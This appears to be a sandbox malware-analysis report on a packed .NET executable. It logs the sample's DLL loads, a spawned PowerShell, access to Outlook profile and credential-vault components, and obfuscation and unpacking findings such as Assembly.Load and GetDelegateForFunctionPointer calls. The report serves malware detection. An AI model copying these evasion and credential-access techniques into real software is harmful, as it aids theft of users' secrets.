                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: 20240328-REV2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 20240328-REV2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: 20240328-REV2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Data.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Accessibility.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb\ source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbSystem.Data.ni.dll< source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdb source: 20240328-REV2.exe, WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdbx source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdbSystem.Data.dll4 source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdbSHA256o source: 20240328-REV2.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.pdb, source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        .NET source code contains potential unpacker
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.cs.Net Code: PRsgCpb7f4 System.Reflection.Assembly.Load(byte[])
                        Source: 20240328-REV2.exeStatic PE information: 0x81577B65 [Wed Oct 6 16:08:05 2038 UTC]
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_05347E88 pushad ; iretd 1_2_05347E91
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA3E3A push ds; ret 1_2_06EA3E3B
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B7E8A push esp; ret 1_2_070B7E91
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_08951CC0 push 00000059h; ret 1_2_08951CF8
                        Source: 20240328-REV2.exeStatic PE information: section name: .text entropy: 7.946644747446866
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, MM0nqSL2pcP1fo9nGr.csHigh entropy of concatenated method names: 'BRqq8Nr7FX', 'M44qo7oWQY', 'y5ldT8nfBy', 'DvMdSxQh4k', 'OLCqfLuBSA', 'cmhq16tpVP', 'SCZqkDDN1X', 'zPWq2w2ZYe', 'SQSqaFD0qB', 'K0YqKpsekJ'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, sCWHAZsS0UutPc9r2g.csHigh entropy of concatenated method names: 'etTqDWEbej', 'aVTq9ZmSyZ', 'ToString', 'ygUqIqK4Vy', 'F03qW68PfY', 'NZXqpU96Xm', 'OmOqAbtClF', 'DoCqOi3l8d', 'i32qeSWy7n', 'C5PqVtpR8w'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, c3RrIbi4S2dSDSPr32.csHigh entropy of concatenated method names: 'MIaALo02Ps', 'XPQAuvKU1o', 'BdKpZnNe28', 'oZdpH33057', 'KcZpEo1nSs', 'GnHp3lMg8f', 'H5UpJBQsaA', 'iHZpMK7nrt', 'CfkpjF5Pvw', 'f9xptrqGQx'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, RnjcWbdlYQfuZx2SOm.csHigh entropy of concatenated method names: 'NV3ONU9Il7', 'qryOmBsdxi', 'Gy9OC70crg', 'iM7OQBdRMC', 'dG9O6bNAK1', 'IAxOuoEXjH', 'gsPOYi4RYW', 'XMqOnsSXcx', 'riLhLPhLs0YYPUZxElo', 'mpS2gHhw8sDS95jecb8'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, CbbCU2jcbmE3ilttJVQ.csHigh entropy of concatenated method names: 'XPCUmg7GMl', 'gLyUyyMIFB', 'kcJUCGjdYv', 'o45UQkBb31', 'PnFULR3T06', 'beRU63YCPm', 'L6sUuOUohj', 'YAVUssRSgx', 'NCPUYTpfA0', 'Xb3Unj10U5'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, YCfeJ21MxuvufFcUrh.csHigh entropy of concatenated method names: 'HOWUSlVCuQ', 'GjmUbCZasf', 'QHcUg24F00', 'KBVUIY5jxf', 'CVwUWnQXjr', 'J1YUANPXeh', 'nDWUOLNUVd', 'OHvdFFywmg', 'cDdd8I8DRv', 'ivUdiHpvQN'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, qhMJ8TxmfrQleFASsy.csHigh entropy of concatenated method names: 'q0CdvORm10', 'jhhdcIwrtE', 'gjWdZ7GPCu', 'VfadH6X2jF', 'dAHd2VXMFO', 'z0pdErBfv4', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, DqO3BeEpxTFOeAX25D.csHigh entropy of concatenated method names: 'lEyW2fbXef', 'bRKWaWfYPc', 'RFeWKROrFu', 'kxnWhsPguS', 'Y8mWRZND18', 'BNZW4sMAW4', 'GpIWFmdBSF', 'APnW86wk1l', 'BwJWiMU5tt', 'S5WWoTsWkw'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, iFn0ALuCn6UUl6nxCD.csHigh entropy of concatenated method names: 'A3lChOBUq', 'evcQKIesi', 'lPd65EsHy', 'sJ9uBV5BS', 'GDvYs6IuH', 'rK0n98r0O', 'IMqjw9yXAiFrBN8hFp', 'RX9j3aOMNkcrx0ELrg', 'EXLdicfCU', 'vZk01eDu0'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, D0L1d8NNnMWQU8RYtI.csHigh entropy of concatenated method names: 'hG2emnaPKs', 'tsbeyrtCq5', 'tN5eCSYfOi', 'VTkeQ3XPQI', 'k2yeLlHI3w', 'bWXe6Bkrqv', 'mVOeuA6pS9', 'gv2esAK9Tf', 'AaDeYEAy2E', 'koVenbvZZu'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, wl90ELqXIUV7JJ3xw4.csHigh entropy of concatenated method names: 'Ve2Se8Zu8a', 'B6YSVoaH9X', 'SraSD3yLD1', 'md7S9jIaoy', 'ytVSPBqfWp', 'HB8SBFmXT2', 'XyN6KE66Jr7neSqXtD', 'wvg9D0jKRgulQQD6bd', 'ENMSSTyKMm', 'NNJSbhFl4X'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, ooGS1Jb8LYOjRI2Nyn.csHigh entropy of concatenated method names: 'Dispose', 'uXESifRvjL', 'fCZGcJMV0w', 'GrOxxgtYnk', 'cR7SonmTru', 'NpdSz49EfY', 'ProcessDialogKey', 'NxNGT255iU', 'nJ1GSoiYGK', 'KbsGGpI7wN'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, Oss1lVFw9xKlL9Fawd.csHigh entropy of concatenated method names: 'dlPdIwagE6', 'iEwdWvK0n8', 'OjhdpVSrVN', 'OoLdAB7lbv', 'adAdOSZmLe', 'gKMdeZCOyp', 'jxJdVOWBto', 'tI8d7YpN2o', 'kIqdDRmfAG', 'xNnd9GJkHG'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, zpbjE8aHbUn0YcN3Lo.csHigh entropy of concatenated method names: 'mGxpQuHixV', 'GQLp6b5hBd', 'p0ipsYAL9G', 'OPvpY246VF', 'TyUpPUGMGR', 'ATIpBh0G62', 'f5MpqALqBL', 'Hkbpdu3aHq', 'DJipUWvVR2', 'rC6p0iGycM'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, wYSy8YM5lVQ1qCEVOD.csHigh entropy of concatenated method names: 'vsAOwHDiaC', 'TKSOWgGvUO', 'Y39OABLnFl', 'ATZOeV25Uc', 'gGkOVTokAH', 'KgpARjRr47', 'PNcA4PN03g', 'e5KAFI95lA', 'oycA8td9ZL', 'rJZAiwAvxP'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, K5uqj8D3Il5pOp6XVP.csHigh entropy of concatenated method names: 'ToString', 'WRhBfx1riw', 'FOoBc1Frlx', 'pe8BZd8hDp', 'XfGBHISJeQ', 'RdrBEibin6', 'YMXB3RW0gx', 'EysBJhUVWa', 'FZsBMO1D20', 'UAmBjHWybS'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, P37vu0CgjevrJVGJRa.csHigh entropy of concatenated method names: 'mFDeIh7gTT', 'AAUepvyqja', 'F5FeOXKrOM', 'lhCOocA2pQ', 'cM0OzAh70f', 'ze5eTaKF6D', 'tGheSe1WkE', 'XRPeGDOrvT', 'Auseb0TkKT', 'dvJegCO0c3'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, GxmFgWhgVkoXLP6vb2.csHigh entropy of concatenated method names: 'LB7PtER1wW', 'S9dP1xwLNa', 'DlUP2NXFfD', 'Q4IPaU7rkv', 'wkBPc8RjWH', 'QQwPZjw1Jf', 'm5wPH8x7Br', 'f8JPEhdFJY', 'sx9P3ibuoK', 'mYWPJ0yXSX'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, tFEshmjWrsGOPEfxccc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LYK023aC5B', 'zOd0afH5t5', 's6G0KoeE7y', 'BvS0hiDCX8', 'TEr0Rgn2tM', 'r3U04m6pk7', 'K6C0FIl0H3'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, z27VGsnctYfwDT4cOl.csHigh entropy of concatenated method names: 'h7uXsqw47h', 'jZNXY53rol', 'YXFXvan21q', 'iFgXc2aV6j', 'uCoXHKNWVJ', 'OEnXEyeA01', 'RT5XJqC0Qi', 'urJXMX7DbY', 'c6bXtHcnPV', 'EWVXfnxmpo'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csHigh entropy of concatenated method names: 'kEDbwLlyxu', 'JhWbI2oSAu', 'yjRbWtwXJ1', 'r6NbpKg0xy', 'uR8bACsltZ', 'BesbO8jEpR', 'GPnbeUcUNb', 't6ibV8rkUx', 'Vrgb7jb01H', 'gDNbDMcFed'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, rHSVVXzwWXSDqXqYTy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FBHUXYQop1', 'bLKUPAZrP1', 'YIxUBRR0rh', 'LmQUq8AUj8', 'xMyUdthDi7', 'rWDUUIrJEV', 'XDXU0PW7i8'
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
